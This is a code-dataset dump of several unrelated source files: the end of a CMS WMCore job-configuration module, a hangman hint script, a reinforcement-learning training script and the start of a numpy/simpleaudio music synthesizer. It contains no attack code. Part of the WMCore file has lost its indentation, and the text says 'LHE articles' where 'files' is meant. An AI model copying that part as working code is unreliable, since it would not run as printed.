inputTypeAttrib.fileNames.append(str(fileLFN))\n                    if requestedPileupType == 'data':\n                        if getattr(self.jobBag, 'skipPileupEvents', None) is not None:\n                            # For deterministic pileup, we want to shuffle the list the\n                            # same for every job in the task and skip events\n                            random.seed(self.job['task'])\n                            self.logger.info(\"Skipping %d pileup events for deterministic data mixing\",\n                                             self.jobBag.skipPileupEvents)\n                            inputTypeAttrib.skipEvents = cms.untracked.uint32(\n                                int(self.jobBag.skipPileupEvents) % eventsAvailable)\n                            inputTypeAttrib.sequential = cms.untracked.bool(True)\n                    # Shuffle according to the seed above or randomly\n                    random.shuffle(inputTypeAttrib.fileNames)\n                    self.logger.info(\"Added %s events from the pileup blocks\", eventsAvailable)\n\n                    # Handle enforceGUIDInFileName for pileup\n                    self.handleEnforceGUIDInFileName(inputTypeAttrib)\n\n        return\n\n    def _getPileupMixingModules(self):\n        \"\"\"\n        Method returns two lists:\n        1) list of mixing modules (\"MixingModule\")\n        2) list of data mixing modules (\"DataMixingModules\")\n        Only pileup files of type \"mc\" get added to the first;\n        only pileup files of type \"data\" get added to the second.\n\n        \"\"\"\n        mixModules, dataMixModules = [], []\n        prodsAndFilters = {}\n        prodsAndFilters.update(self.process.producers)\n        prodsAndFilters.update(self.process.filters)\n        for key, value in prodsAndFilters.items():\n            if value.type_() in [\"MixingModule\", \"DataMixingModule\", \"PreMixingModule\"]:\n                mixModules.append(value)\n            if value.type_() == \"DataMixingModule\":\n                dataMixModules.append(value)\n        return mixModules, dataMixModules\n\n    def _getPileupConfigFromJson(self):\n        \"\"\"\n        The pileup configuration was stored in a JSON file as a result of\n        DBS querying when running PileupFetcher; this method loads that\n        configuration from the sandbox and returns it as a dictionary.\n\n        The PileupFetcher was called by WorkQueue, which creates the job's sandbox,\n        and the sandbox gets migrated to the worker node.\n\n        \"\"\"\n        workingDir = self.stepSpace.location\n        jsonPileupConfig = os.path.join(workingDir, \"pileupconf.json\")\n        self.logger.info(\"Pileup JSON configuration file: '%s'\", jsonPileupConfig)\n        try:\n            with open(jsonPileupConfig) as jdata:\n                pileupDict = json.load(jdata)\n        except IOError:\n            m = \"Could not read pileup JSON configuration file: '%s'\" % jsonPileupConfig\n            raise RuntimeError(m)\n        return pileupDict\n\n    def handleProducersNumberOfEvents(self):\n        \"\"\"\n        _handleProducersNumberOfEvents_\n\n        Some producer modules are initialized with a maximum number of events\n        to be generated, usually based on the process.maxEvents.input attribute,\n        but after that attribute is tweaked the producers' number of events needs\n        to be fixed as well. This method takes care of that.\n        \"\"\"\n        producers = {}\n        producers.update(self.process.producers)\n        for producer in producers:\n            if hasattr(producers[producer], \"nEvents\"):\n                producers[producer].nEvents = self.process.maxEvents.input.value()\n\n    def handleDQMFileSaver(self):\n        \"\"\"\n        _handleDQMFileSaver_\n\n        Harvesting jobs have the dqmFileSaver EDAnalyzer that must\n        be tweaked with the dataset name in order to store it\n        properly in the DQMGUI; other tweaks can be added as well\n        \"\"\"\n        if not hasattr(self.process, \"dqmSaver\"):\n            return\n\n        runIsComplete = getattr(self.jobBag, \"runIsComplete\", False)\n        multiRun = getattr(self.jobBag, \"multiRun\", False)\n        runLimits = getattr(self.jobBag, \"runLimits\", \"\")\n        self.logger.info(\"DQMFileSaver set to multiRun: %s, runIsComplete: %s, runLimits: %s\",\n                         multiRun, runIsComplete, runLimits)\n\n        self.process.dqmSaver.runIsComplete = cms.untracked.bool(runIsComplete)\n        if multiRun and isCMSSWSupported(self.getCmsswVersion(), \"CMSSW_8_0_0\"):\n            self.process.dqmSaver.forceRunNumber = cms.untracked.int32(999999)\n        if hasattr(self.step.data.application.configuration, \"pickledarguments\"):\n            args = pickle.loads(self.step.data.application.configuration.pickledarguments)\n            datasetName = args.get('datasetName', None)\n            if datasetName:\n                if multiRun:\n                    # then change the dataset name in order to get a different root file name\n                    datasetName = datasetName.rsplit('/', 1)\n                    datasetName[0] += runLimits\n                    datasetName = \"/\".join(datasetName)\n                self.process.dqmSaver.workflow = cms.untracked.string(datasetName)\n        return\n\n    def handleLHEInput(self):\n        \"\"\"\n        _handleLHEInput_\n\n        Enable lazy-download for jobs reading LHE articles from CERN, such\n        that these jobs can read data remotely\n        \"\"\"\n        if getattr(self.jobBag, \"lheInputFiles\", False):\n            self.logger.info(\"Enabling 'lazy-download' for lheInputFiles job\")\n            self.process.add_(cms.Service(\"SiteLocalConfigService\",\n                                          overrideSourceCacheHintDir=cms.untracked.string(\"lazy-download\")))\n\n        return\n\n    def handleRepackSettings(self):\n        \"\"\"\n        _handleRepackSettings_\n\n        Repacking small events is very inefficient when reading directly from EOS.\n        \"\"\"\n        self.logger.info(\"Hardcoding read/cache strategies for repack\")\n        self.process.add_(\n            cms.Service(\"SiteLocalConfigService\",\n                        overrideSourceCacheHintDir=cms.untracked.string(\"lazy-download\")\n                        )\n        )\n\n        return\n\n    def handleSingleCoreOverride(self):\n        \"\"\"\n        _handleSingleCoreOverride_\n\n        Make sure the job only uses one core and one stream in CMSSW\n        \"\"\"\n        try:\n            if int(self.step.data.application.multicore.numberOfCores) > 1:\n                self.step.data.application.multicore.numberOfCores = 1\n        except AttributeError:\n            pass\n\n        try:\n            if int(self.step.data.application.multicore.eventStreams) > 0:\n                
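# eventStreams == 0 lets CMSSW derive the number of streams from the thread\n                # count, so the single-core override also collapses to a single stream\n                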
self.step.data.application.multicore.eventStreams = 0\n except AttributeError:\n pass\n\n return\n\n def handleSpecialCERNMergeSettings(self, funcName):\n \"\"\"\n _handleSpecialCERNMergeSettings_\n\n CERN has a 30ms latency between Meyrin and Wigner, which kills merge performance\n Enable lazy-download for fastCloning for all CMSSW_7_5 jobs (currently off)\n Enable lazy-download for all merge jobs\n \"\"\"\n if self.getCmsswVersion().startswith(\"CMSSW_7_5\") and False:\n self.logger.info(\"Using fastCloning/lazydownload\")\n self.process.add_(cms.Service(\"SiteLocalConfigService\",\n overrideSourceCloneCacheHintDir=cms.untracked.string(\"lazy-download\")))\n elif funcName == \"merge\":\n self.logger.info(\"Using lazydownload\")\n self.process.add_(cms.Service(\"SiteLocalConfigService\",\n overrideSourceCacheHintDir=cms.untracked.string(\"lazy-download\")))\n return\n\n def handleCondorStatusService(self):\n \"\"\"\n _handleCondorStatusService_\n\n Enable CondorStatusService for CMSSW releases that support it.\n \"\"\"\n if isCMSSWSupported(self.getCmsswVersion(), \"CMSSW_7_6_0\"):\n self.logger.info(\"Tag chirp updates from CMSSW with step %s\", self.step.data._internal_name)\n self.process.add_(cms.Service(\"CondorStatusService\",\n tag=cms.untracked.string(\"_%s_\" % self.step.data._internal_name)))\n\n return\n\n def handleEnforceGUIDInFileName(self, secondaryInput=None):\n \"\"\"\n _handleEnforceGUIDInFileName_\n\n Enable enforceGUIDInFileName for CMSSW releases that support it.\n \"\"\"\n # skip it for CRAB jobs\n if self.crabPSet:\n return\n\n if secondaryInput:\n inputSource = secondaryInput\n self.logger.info(\"Evaluating enforceGUIDInFileName parameter for secondary input data.\")\n else:\n inputSource = self.process.source\n\n # only enable if source is PoolSource or EmbeddedRootSource\n if inputSource.type_() not in [\"PoolSource\", \"EmbeddedRootSource\"]:\n self.logger.info(\"Not evaluating enforceGUIDInFileName parameter for process source %s\",\n inputSource.type_())\n return\n\n self.logger.info(\"Evaluating if release %s supports enforceGUIDInFileName parameter...\",\n self.getCmsswVersion())\n\n # enable if release supports enforceGUIDInFileName\n if isEnforceGUIDInFileNameSupported(self.getCmsswVersion()):\n # check to make sure primary input files follow guid naming convention\n # prevents enabling guid checks on some workflows (StoreResults/StepChain) that use custom input file names\n # EmbeddedRootSource input files will always follow guid naming convention\n if inputSource.type_() == \"PoolSource\" and inputSource.fileNames:\n guidRegEx = re.compile(\"[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}.root$\")\n if not guidRegEx.search(inputSource.fileNames[0]):\n self.logger.info(\"Not enabling enforceGUIDInFileName due to non-GUID input file names\")\n return\n self.logger.info(\"Setting enforceGUIDInFileName to True.\")\n inputSource.enforceGUIDInFileName = cms.untracked.bool(True)\n else:\n self.logger.info(\"CMSSW release does not support enforceGUIDInFileName.\")\n\n return\n\n def getCmsswVersion(self):\n \"\"\"\n _getCmsswVersion_\n\n Return a string representing the CMSSW version to be used.\n \"\"\"\n if not self.crabPSet:\n return self.step.data.application.setup.cmsswVersion\n else:\n # CRAB3 needs to use an environment var to get the version\n return os.environ.get(\"CMSSW_VERSION\", \"\")\n\n def __call__(self):\n \"\"\"\n _call_\n\n Examine the step configuration and construct a PSet from that.\n\n \"\"\"\n self.logger.info(\"Executing 
SetupCMSSWPSet...\")\n self.jobBag = self.job.getBaggage()\n\n scenario = getattr(self.step.data.application.configuration, \"scenario\", None)\n if scenario is not None and scenario != \"\":\n self.logger.info(\"Setting up job scenario/process\")\n funcName = getattr(self.step.data.application.configuration, \"function\", None)\n if getattr(self.step.data.application.configuration, \"pickledarguments\", None) is not None:\n funcArgs = pickle.loads(self.step.data.application.configuration.pickledarguments)\n else:\n funcArgs = {}\n try:\n self.createProcess(scenario, funcName, funcArgs)\n except Exception as ex:\n self.logger.exception(\"Error creating process for Config/DataProcessing:\")\n raise ex\n\n if funcName == \"repack\":\n self.handleRepackSettings()\n\n if funcName in [\"merge\", \"alcaHarvesting\"]:\n self.handleSingleCoreOverride()\n\n if socket.getfqdn().endswith(\"cern.ch\"):\n self.handleSpecialCERNMergeSettings(funcName)\n\n else:\n try:\n self.loadPSet()\n except Exception as ex:\n self.logger.exception(\"Error loading PSet:\")\n raise ex\n\n # Check process.source exists\n if getattr(self.process, \"source\", None) is None:\n msg = \"Error in CMSSW PSet: process is missing attribute 'source'\"\n msg += \" or process.source is defined with None value.\"\n self.logger.error(msg)\n raise RuntimeError(msg)\n\n self.handleCondorStatusService()\n\n self.fixupProcess()\n\n # In case of CRAB3, the number of threads in the PSet should not be overridden\n if not self.crabPSet:\n try:\n origCores = int(getattr(self.step.data.application.multicore, 'numberOfCores', 1))\n eventStreams = int(getattr(self.step.data.application.multicore, 'eventStreams', 0))\n resources = {'cores': origCores}\n resizeResources(resources)\n numCores = resources['cores']\n if numCores != origCores:\n self.logger.info(\n \"Resizing a job with nStreams != nCores. Setting nStreams = nCores. 
This may end badly.\")\n eventStreams = 0\n options = getattr(self.process, \"options\", None)\n if options is None:\n self.process.options = cms.untracked.PSet()\n options = getattr(self.process, \"options\")\n options.numberOfThreads = cms.untracked.uint32(numCores)\n options.numberOfStreams = cms.untracked.uint32(eventStreams)\n except AttributeError as ex:\n self.logger.error(\"Failed to override numberOfThreads: %s\", str(ex))\n\n psetTweak = getattr(self.step.data.application.command, \"psetTweak\", None)\n if psetTweak is not None:\n self.applyPSetTweak(psetTweak, self.fixupDict)\n\n # Apply task level tweaks\n taskTweak = makeTaskTweak(self.step.data)\n applyTweak(self.process, taskTweak, self.fixupDict)\n\n # Check if chained processing is enabled\n # If not - apply the per job tweaks\n # If so - create an override TFC (like done in PA) and then modify thePSet accordingly\n if hasattr(self.step.data.input, \"chainedProcessing\") and self.step.data.input.chainedProcessing:\n self.handleChainedProcessing()\n else:\n # Apply per job PSet Tweaks\n jobTweak = makeJobTweak(self.job)\n applyTweak(self.process, jobTweak, self.fixupDict)\n\n # check for pileup settings presence, pileup support implementation\n # and if enabled, process pileup configuration / settings\n if hasattr(self.step.data, \"pileup\"):\n self.handlePileup()\n\n # Apply per output module PSet Tweaks\n cmsswStep = self.step.getTypeHelper()\n for om in cmsswStep.listOutputModules():\n mod = cmsswStep.getOutputModule(om)\n outTweak = makeOutputTweak(mod, self.job)\n applyTweak(self.process, outTweak, self.fixupDict)\n\n # revlimiter for testing\n if getattr(self.step.data.application.command, \"oneEventMode\", False):\n self.process.maxEvents.input = 1\n\n # check for random seeds and the method of seeding which is in the job baggage\n self.handleSeeding()\n\n # make sure default parametersets for perf reports are installed\n self.handlePerformanceSettings()\n\n # check for event numbers in the producers\n self.handleProducersNumberOfEvents()\n\n # fixup the dqmFileSaver\n self.handleDQMFileSaver()\n\n # tweak for jobs reading LHE articles from CERN\n self.handleLHEInput()\n\n # tweak jobs for enforceGUIDInFileName\n self.handleEnforceGUIDInFileName()\n\n # Check if we accept skipping bad files\n if hasattr(self.step.data.application.configuration, \"skipBadFiles\"):\n self.process.source.skipBadFiles = \\\n cms.untracked.bool(self.step.data.application.configuration.skipBadFiles)\n\n # Apply events per lumi section if available\n if hasattr(self.step.data.application.configuration, \"eventsPerLumi\"):\n self.process.source.numberEventsInLuminosityBlock = \\\n cms.untracked.uint32(self.step.data.application.configuration.eventsPerLumi)\n\n # limit run time if desired\n if hasattr(self.step.data.application.configuration, \"maxSecondsUntilRampdown\"):\n self.process.maxSecondsUntilRampdown = cms.untracked.PSet(\n input=cms.untracked.int32(self.step.data.application.configuration.maxSecondsUntilRampdown))\n\n # accept an overridden TFC from the step\n if hasattr(self.step.data.application, 'overrideCatalog'):\n self.logger.info(\"Found a TFC override: %s\", self.step.data.application.overrideCatalog)\n self.process.source.overrideCatalog = \\\n cms.untracked.string(self.step.data.application.overrideCatalog)\n\n configFile = self.step.data.application.command.configuration\n configPickle = getattr(self.step.data.application.command, \"configurationPickle\", \"PSet.pkl\")\n workingDir = self.stepSpace.location\n try:\n with 
open(\"%s/%s\" % (workingDir, configPickle), 'wb') as pHandle:\n pickle.dump(self.process, pHandle)\n\n with open(\"%s/%s\" % (workingDir, configFile), 'w') as handle:\n handle.write(\"import FWCore.ParameterSet.Config as cms\\n\")\n handle.write(\"import pickle\\n\")\n handle.write(\"with open('%s', 'rb') as handle:\\n\" % configPickle)\n handle.write(\" process = pickle.load(handle)\\n\")\n except Exception as ex:\n self.logger.exception(\"Error writing out PSet:\")\n raise ex\n self.logger.info(\"CMSSW PSet setup completed!\")\n\n return 0\n","sub_path":"src/python/WMCore/WMRuntime/Scripts/SetupCMSSWPset.py","file_name":"SetupCMSSWPset.py","file_ext":"py","file_size_in_byte":34326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582069396","text":"myWord = \"hello\"\r\n\r\nchoice = input(\"Type a word: \")\r\n\r\nif choice == myWord:\r\n\tprint(\"It's a match\")\r\nelse:\r\n\tprint(\"Not a match\")\r\n\r\n# how to check if a letter is in a word\r\nletter = input(\"Type a letter\")\r\nif letter in myWord:\r\n\tprint(\"Letter is in the word\")\r\nelse:\r\n\tprint(\"Letter is not in the word\")\r\n\r\ncount = 0\r\nfor s in myWord:\r\n\tif s == letter:\r\n\t\tprint(count)\r\n\tcount += 1","sub_path":"HangManHints.py","file_name":"HangManHints.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"154873595","text":"# coding:utf-8\nimport time\nimport argparse\nimport tensorflow as tf\nfrom utils import get_time, plot_results\nfrom Agent import Agent\nfrom EADQN import DeepQLearner\nfrom cEnvironment import Environment\nfrom ReplayMemory import ReplayMemory\nfrom gensim.models import KeyedVectors\nfrom tqdm import tqdm\nfrom keras.backend import set_image_data_format\nfrom keras.backend.tensorflow_backend import set_session\nfrom flair.embeddings import WordEmbeddings, FlairEmbeddings, StackedEmbeddings, ELMoEmbeddings, BertEmbeddings, BPEmb, CharacterEmbeddings\n\n\ndef preset_args():\n parser = argparse.ArgumentParser()\n\n envarg = parser.add_argument_group('Environment')\n envarg.add_argument(\"--domain\", type=str, default='cooking', help=\"\")\n envarg.add_argument(\"--contextual_embedding\", type=str, default='elmo', help=\"\")\n envarg.add_argument(\"--model_dim\", type=str, default=50, help=\"embedding dimension\") # word2vec 50.\n envarg.add_argument(\"--num_words\", type=int, default=500, help=\"number of words to consider for act model is 500. 
Arg model is 100\") # 100 if arguments.\n envarg.add_argument(\"--context_len\", type=int, default=100, help=\"\")\n envarg.add_argument(\"--word_dim\", type=int, default=868, help=\"dim of word embedding\")\n envarg.add_argument(\"--tag_dim\", type=int, default=868, help=\"\")\n envarg.add_argument(\"--dis_dim\", type=int, default=868, help=\"\")\n envarg.add_argument(\"--reward_assign\", type=list, default=[1, 2, 3], help='')\n envarg.add_argument(\"--reward_base\", type=float, default=50.0, help=\"\")\n envarg.add_argument(\"--object_rate\", type=float, default=0.07, help='')\n envarg.add_argument(\"--action_rate\", type=float, default=0.10, help=\"\")\n envarg.add_argument(\"--use_act_rate\", type=int, default=1, help='')\n\n memarg = parser.add_argument_group('Replay memory')\n memarg.add_argument(\"--positive_rate\", type=float, default=0.9, help=\"\")\n memarg.add_argument(\"--priority\", type=int, default=1, help=\"\")\n memarg.add_argument(\"--save_replay\", type=int, default=0, help=\"\")\n memarg.add_argument(\"--load_replay\", type=int, default=0, help=\"\")\n memarg.add_argument(\"--replay_size\", type=int, default=50000, help=\"\")\n memarg.add_argument(\"--save_replay_size\", type=int, default=1000, help=\"\")\n memarg.add_argument(\"--save_replay_name\", type=str, default='data/saved_replay_memory.pkl', help=\"\")\n\n netarg = parser.add_argument_group('Deep Q-learning network')\n netarg.add_argument(\"--batch_size\", type=int, default=32, help=\"\")\n netarg.add_argument(\"--num_filters\", type=int, default=32, help=\"\")\n netarg.add_argument(\"--dense_dim\", type=int, default=256, help=\"\")\n netarg.add_argument(\"--num_actions\", type=int, default=2, help=\"\")\n netarg.add_argument(\"--optimizer\", type=str, default='adam', help=\"\")\n netarg.add_argument(\"--learning_rate\", type=float, default=0.001, help=\"\")\n netarg.add_argument(\"--dropout\", type=float, default=0.5, help=\"\")\n netarg.add_argument(\"--gamma\", type=float, default=0.9, help=\"\")\n\n antarg = parser.add_argument_group('Agent')\n antarg.add_argument(\"--exploration_rate_start\", type=float, default=1, help=\"\")\n antarg.add_argument(\"--exploration_rate_end\", type=float, default=0.1, help=\"\")\n antarg.add_argument(\"--exploration_rate_test\", type=float, default=0.0, help=\"\")\n antarg.add_argument(\"--exploration_decay_steps\", type=int, default=1000, help=\"\")\n antarg.add_argument(\"--train_frequency\", type=int, default=1, help=\"\")\n antarg.add_argument(\"--train_repeat\", type=int, default=1, help=\"\")\n antarg.add_argument(\"--target_steps\", type=int, default=5, help=\"\")\n antarg.add_argument(\"--random_play\", type=int, default=0, help=\"\")\n antarg.add_argument(\"--display_training_result\", type=int, default=1, help='')\n antarg.add_argument(\"--filter_act_ind\", type=int, default=1, help='')\n\n mainarg = parser.add_argument_group('Main loop')\n mainarg.add_argument(\"--gui_mode\", type=bool, default=False, help='')\n mainarg.add_argument(\"--epochs\", type=int, default=1, help=\"\")\n mainarg.add_argument(\"--start_epoch\", type=int, default=0, help=\"\")\n mainarg.add_argument(\"--stop_epoch_gap\", type=int, default=5, help=\"\")\n mainarg.add_argument(\"--train_episodes\", type=int, default=50, help=\"\")\n mainarg.add_argument(\"--load_weights\", type=bool, default=False, help=\"\")\n mainarg.add_argument(\"--save_weights\", type=bool, default=True, help=\"\")\n mainarg.add_argument(\"--agent_mode\", type=str, default='act', help='action dqn or argument dqn')\n\n\n 
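# NOTE: args_init() below overrides several of these defaults (word_dim,\n    # batch_size, num_words) depending on --contextual_embedding and --agent_mode;\n    # e.g. a hypothetical run: python cmain.py --contextual_embedding flair --agent_mode arg\n    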
return parser.parse_args()\n\ndef args_init(args):\n # initialize word2vec\n args.word2vec = KeyedVectors.load_word2vec_format('data/mymodel-new-5-%d' % args.model_dim, binary=True)\n\n # initialize contextual embedding dimensions\n if args.contextual_embedding == 'word2vec':\n args.word_dim = args.tag_dim = args.dis_dim = 50\n args.stacked_embeddings = 'word2vec'\n elif args.contextual_embedding == 'elmo': #glove + elmo\n args.word_dim = args.tag_dim = args.dis_dim = 868\n ## stacked embeddings\n # create a StackedEmbedding object that combines glove and forward/backward flair embeddings\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n ELMoEmbeddings('small')\n ])\n\n elif args.contextual_embedding == 'bert': #glove + bert\n args.word_dim = args.tag_dim = args.dis_dim = 3172\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n BertEmbeddings('bert-base-uncased')\n ])\n args.batch_size = 8\n\n elif args.contextual_embedding == 'flair': #glove + flair-forward + flair-backward\n args.word_dim = args.tag_dim = args.dis_dim = 4196\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n FlairEmbeddings('mix-forward', chars_per_chunk=128),\n FlairEmbeddings('mix-backward', chars_per_chunk=128)\n ])\n if args.agent_mode == 'act':\n args.batch_size = 8\n else:\n args.batch_size = 8\n\n elif args.contextual_embedding == 'glove': # not tested\n args.word_dim = args.tag_dim = args.dis_dim = 100\n args.stacked_embeddings = StackedEmbeddings([\n WordEmbeddings('glove'),\n ])\n\n # weights loaded, set exploration rate to minimum\n if args.load_weights: # 1 to 0.1. decayed to minimum.\n args.exploration_rate_start = args.exploration_rate_end\n\n # agent mode arguments, set number of words to 100\n if args.agent_mode == 'arg':\n args.num_words = args.context_len\n args.display_training_result = 0\n\n args.result_dir = 'results/%s_%s_%s' % (args.domain, args.agent_mode, args.contextual_embedding)\n\n return args\n\ndef main(args):\n print('Current time is: %s' % get_time())\n print('Starting at main...')\n result = {'rec': [], 'pre': [], 'f1': [], 'rw': []}\n\n start = time.time()\n\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config)) # global Keras session\n\n env_act = Environment(args, args.agent_mode)\n net_act = DeepQLearner(args, args.agent_mode, 'channels_last')\n mem_act = ReplayMemory(args, args.agent_mode)\n agent = Agent(env_act, mem_act, net_act, args) # agent takes in environment, memory, model and agent_mode\n\n # loop over epochs\n epoch_result = {'rec': [0.0], 'pre': [0.0], 'f1': [0.0], 'rw': [0.0]}\n training_result = {'rec': [], 'pre': [], 'f1': [], 'loss': [], 'rw': []}\n test_result = {'rec': [], 'pre': [], 'f1': [], 'loss': [], 'rw': []}\n log_epoch = 0\n\n\n # if we are loading weights, we don't need to train [no exploration is required. 
We have exploration rate start = end = 0.1], just test on test set.\n if args.load_weights:\n print('Loading weights ...')\n filename = 'weights/%s_%s_%s.h5' % (args.domain, args.agent_mode, args.contextual_embedding)\n net_act.load_weights(filename)\n #accuracy on test set\n with open(\"%s.txt\" % (args.result_dir + 'testset'), 'w') as outfile:\n rec, pre, f1, rw = agent.test(args.test_steps, outfile, test_flag=True)\n outfile.write('\\n\\n Test f1 value: {}, recall : {}, precision : {}, reward: {} \\n'.format(f1, rec,pre,rw ))\n print('\\n\\n Test f1 value: {}, recall : {}, precision : {}, reward: {} \\n'.format(f1, rec,pre,rw ))\n\n if not args.load_weights:\n with open(\"%s.txt\" % (args.result_dir), 'w') as outfile:\n print('\\n Arguments:')\n outfile.write('\\n Arguments:\\n')\n for k, v in sorted(args.__dict__.items(), key=lambda x: x[0]):\n print('{}: {}'.format(k, v))\n outfile.write('{}: {}\\n'.format(k, v))\n print('\\n')\n outfile.write('\\n')\n\n # do training\n\n for epoch in tqdm(range(args.start_epoch, args.start_epoch + args.epochs)):\n num_test = -1\n env_act.train_epoch_end_flag = False\n while not env_act.train_epoch_end_flag: #unless all documents are covered\n # training\n num_test += 1\n restart_init = False if num_test > 0 else True\n tmp_result = agent.train(args.train_steps, args.train_episodes, restart_init) #Train episodes = 50 , max episodes.\n for k in training_result:\n training_result[k].extend(tmp_result[k])\n\n rec, pre, f1, rw = agent.test(args.valid_steps, outfile) # not testing; actually validation\n\n if f1 > max(epoch_result['f1']):\n if args.save_weights:\n filename = 'weights/%s_%s_%s.h5' % (args.domain, args.agent_mode, args.contextual_embedding)\n net_act.save_weights(filename)\n\n epoch_result['f1'].append(f1)\n epoch_result['rec'].append(rec)\n epoch_result['pre'].append(pre)\n epoch_result['rw'].append(rw)\n log_epoch = epoch\n outfile.write('\\n\\n Best f1 value: {} best epoch: {}\\n'.format(epoch_result, log_epoch))\n print('\\n\\n Best f1 value: {} best epoch: {}\\n'.format(epoch_result, log_epoch))\n\n # if no improvement after args.stop_epoch_gap, break\n # EARLY STOPPING\n if epoch - log_epoch >= args.stop_epoch_gap:\n outfile.write('\\n\\nBest f1 value: {} best epoch: {}\\n'.format(epoch_result, log_epoch))\n print('\\nepoch: %d result_dir: %s' % (epoch, args.result_dir))\n print('-----Early stopping, no improvement after %d epochs-----\\n' % args.stop_epoch_gap)\n break\n\n # if args.save_replay: #0 by default\n # mem_act.save(args.save_replay_name, args.save_replay_size)\n\n filename = '%s_training_process.pdf' % (args.result_dir)\n plot_results(epoch_result, args.domain, filename)\n outfile.write('\\n\\n training process:\\n{}\\n\\n'.format(epoch_result))\n\n best_ind = epoch_result['f1'].index(max(epoch_result['f1']))\n for k in epoch_result:\n result[k].append(epoch_result[k][best_ind])\n outfile.write('{}: {}\\n'.format(k, result[k]))\n print(('{}: {}\\n'.format(k, result[k])))\n avg_f1 = sum(result['f1']) / len(result['f1'])\n avg_rw = sum(result['rw']) / len(result['rw'])\n outfile.write('\\nAvg f1: {} Avg reward: {}\\n'.format(avg_f1, avg_rw))\n print('\\nAvg f1: {} Avg reward: {}\\n'.format(avg_f1, avg_rw))\n\n tf.compat.v1.reset_default_graph()\n end = time.time()\n print('Total time cost: %ds' % (end - start))\n print('Current time is: %s\\n' % get_time())\n\nif __name__ == '__main__':\n args = args_init(preset_args())\n set_image_data_format('channels_last')\n 
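# 'channels_last' matches the data_format handed to DeepQLearner inside main()\n    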
main(args)\n\n","sub_path":"cmain.py","file_name":"cmain.py","file_ext":"py","file_size_in_byte":12083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127314558","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nProject: Harmony is digital\nAuthors: Capucine Foucher and Emma Desté\nPromo: EFREI 2025\nRole: this is the main file in charge of :\n- setting the graphic interface,\n- read songs collection from a file,\n- write songs collection in a file,\n- create digital sound using numpy,\n- play sound using simpleaudio.\n\"\"\"\n\nfrom util_notes import *\n\nimport tkinter as tk\nfrom tkinter import Canvas\n\nimport simpleaudio as sa\nimport simpleaudio.functionchecks as fc\n\nimport numpy as np\nfrom numpy import pi\n\nfrom math import sqrt\n\nimport re # regular expression to clean special characters (here carriage return)\n\n# Creation of global variables\n# Simpleaudio variables\nglob_po = 0 # simpleaudio playable object\nsample_rate = 44100 # audio signal is sliced 44100 times per second\n\n# General usage global variable\nglob_collection = [] # all songs in a list of [(tile1, partition1),(title2, partition2),...]\nglob_croche_duration = 0.125 # a croche has a musical duration of 125ms, linked to glob_croche_dur_sv\n\n# Graphic interface variables\nglob_root = tk.Tk()\nglob_lbsong = 0 # listbox with all songs title\nglob_canvas1 = 0 # graphical display of the note beginning\nglob_canvas2 = 0 # graphical display of the entire note\nglob_instrum = tk.StringVar() # instrument name, e.g. \"Organ\"\nglob_inv = tk.StringVar() # inversion ticked box\nglob_transpo = tk.StringVar() # input area for the transposition value, e.g. \"0\" means no transposition\nglob_croche_dur_sv = tk.StringVar() # input area for the croche duration in ms, e.g. \"125\" means 0.125s\n\n\n# Simpleaudio functions\n\ndef sound_test_loudspeakers():\n \"\"\"\n Sound test on left and right loudspeakers\n :return None, drive the audio output\n effect on the program: audible sound played\n \"\"\"\n fc.LeftRightCheck.run()\n\n\ndef sound_test_superposition():\n \"\"\"\n Sound test on superposition of notes\n :return None, drive the audio output\n effect on the program: multiple audible sounds played\n \"\"\"\n fc.OverlappingCheck.run()\n\n\ndef play_note(frequence, musical_duration):\n \"\"\"\n Create the sound of a note based on its frequency, its duration and the instrument used\n :param int frequence: frequency in Hertz\n :param int musical_duration: duration of a note, e.g. 
2 for croche, 16 for ronde\n :return None, drive the audio output\n effect on the program: audible sound played\n \"\"\"\n global glob_po\n duration = (musical_duration * glob_croche_duration) / 2 # code duration of croche is 2\n time = np.linspace(0, duration, int(duration * sample_rate), False) # time is a list of time\n # False because we want 1/sample_rate between each value\n if frequence > 0:\n if glob_instrum.get() == \"Sinus\":\n signal = np.sin(frequence * time * 2 * pi)\n elif glob_instrum.get() == \"Rectangles\":\n signal = np.sign(np.sin(time * 2 * pi * frequence))\n elif glob_instrum.get() == \"Organ\":\n signal = 0.4 * (np.sin(time * 2 * pi * frequence)) + 0.5 * (\n np.sin(time * 2 * pi * (frequence / 4))) + 0.1 * (np.sin(time * 2 * pi * (frequence * 4)))\n elif glob_instrum.get() == \"UFO\":\n signal = 0.2 * (np.sin(time * 2 * pi * frequence)) + 0.4 * (\n np.sin(time * 2 * pi * (frequence / sqrt(2)))) + 0.4 * (np.sin(time * 2 * pi * (frequence * sqrt(2))))\n else:\n print(\"Erreur : instrument inconnu\")\n return\n else: # to play nothing (silence)\n signal = time * 0.0 # to generate a flat signal\n\n # envelope : important to differentiate two following same notes (with ears)\n # TODO improved envelope using https: // fr.wikipedia.org / wiki / Enveloppe_sonore\n envelope = np.exp(-time * 3)\n signal = signal * envelope\n draw(signal) # when we are between -1 and 1\n\n tone = signal * 8388607 # 8388607 = 2^23 : to stretch -1,1 to 24 bits\n tone = tone.astype(np.int32) # transform list of floats to list of integers on 32 bits\n\n i = 0\n byte_array = []\n for b in tone.tobytes():\n if i % 4 != 3: # to keep only 3 bytes on 4\n byte_array.append(b)\n i += 1\n audio = bytearray(byte_array)\n\n glob_po = sa.play_buffer(audio, 1, 3, sample_rate) # playobject\n # 1 = number of audio channel : mono,\n # 3 = number of bytes : 3 bytes = 24 bits\n\n if glob_po != 0: # wait for the end of a potential previous note\n glob_po.wait_done()\n\n\ndef play_notes(frequence, duration):\n \"\"\"\n Create the sound of each notes based on its frequency and its duration using the function play_note\n :param int frequence: frequency in Hertz\n :param int duration: list of duration of notes, e.g. 
